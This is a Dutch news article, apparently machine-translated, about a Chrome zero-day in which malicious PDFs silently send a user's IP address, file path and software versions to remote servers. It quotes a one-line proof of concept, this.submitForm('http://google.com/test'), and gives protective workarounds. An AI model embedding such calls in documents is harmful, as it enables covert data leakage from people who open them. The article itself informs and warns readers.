Exploitdetectieservice EdgeSpot heeft een intrigerende Chrome zero-day kwetsbaarheid ontdekt die PDF-documenten exploiteert. Door het beveiligingslek kunnen aanvallers gevoelige gegevens verzamelen met behulp van kwaadaardige PDF-documenten die in Chrome zijn geopend.

Zodra het slachtoffer de respectieve PDF-bestanden in Google Chrome opent, begint een kwaadaardig programma op de achtergrond te werken door gebruikersgegevens te verzamelen.

De gegevens worden vervolgens doorgestuurd naar de externe server die wordt beheerd door de hackers. Je vraagt ​​je misschien af ​​welke gegevens door de aanvallers worden opgezogen, ze richten zich op de volgende gegevens op je pc:

• IP adres
• Volledig pad van het PDF-bestand op het systeem
• OS- en Chrome-versies

Pas op voor malware-bereden PDF-bestanden

Het zal je misschien verbazen dat er niets gebeurt wanneer Adobe Reader wordt gebruikt voor het openen van PDF-bestanden. Bovendien worden HTTP POST-aanvragen gebruikt om gegevens over te dragen naar de externe servers zonder tussenkomst van de gebruiker.

Experts zagen dat een van de twee domeinen readnotifycom of burpcollaboratornet de gegevens ontving.

U kunt zich de intensiteit van de aanval voorstellen door te overwegen dat de meeste antivirussoftware de door EdgeSpot gedetecteerde monsters niet kan detecteren.

Experts onthullen dat de aanvallers de "this.submitForm ()" PDF Javascript API gebruiken om de gevoelige informatie van de gebruikers te verzamelen.

We hebben het getest met een minimale PoC, een eenvoudige API-aanroep zoals "this.submitForm ('http://google.com/test')" zorgt ervoor dat Google Chrome de persoonlijke gegevens naar google.com verzendt.

De experts kwamen er eigenlijk achter dat deze Chrome-bug werd uitgebuit door twee verschillende sets kwaadaardige PDF-bestanden. Beide werden respectievelijk in oktober 2017 en september 2018 verspreid.

De verzamelde gegevens kunnen met name door de aanvallers worden gebruikt om aanvallen in de toekomst te verfijnen. Rapporten suggereren dat de eerste batch bestanden is gecompileerd met behulp van de PDF-trackingservice van ReadNotify.

Gebruikers kunnen de service gebruiken om gebruikersweergaven bij te houden. EdgeSpot heeft geen details gedeeld met betrekking tot de aard van de tweede set PDF-bestanden.

Hoe u beschermd blijft

De Exploit-detectieservice EdgeSpot wilde de Chrome-gebruikers van de gebruikers waarschuwen voor de mogelijke risico's omdat de patch naar verwachting niet in de nabije toekomst wordt uitgebracht.

EdgeSpot rapporteerde vorig jaar aan Google over de kwetsbaarheid en het bedrijf beloofde eind april een patch uit te brengen. H

u kunt echter overwegen om een ​​tijdelijke oplossing voor het probleem te gebruiken door de ontvangen PDF-documenten lokaal te bekijken met een alternatieve app voor het lezen van PDF-bestanden.

Als alternatief kunt u ook uw PDF-documenten in Chrome openen door uw systemen los te koppelen van internet. Ondertussen kunt u wachten op de Chrome 74-update die naar verwachting op 23 april wordt uitgerold.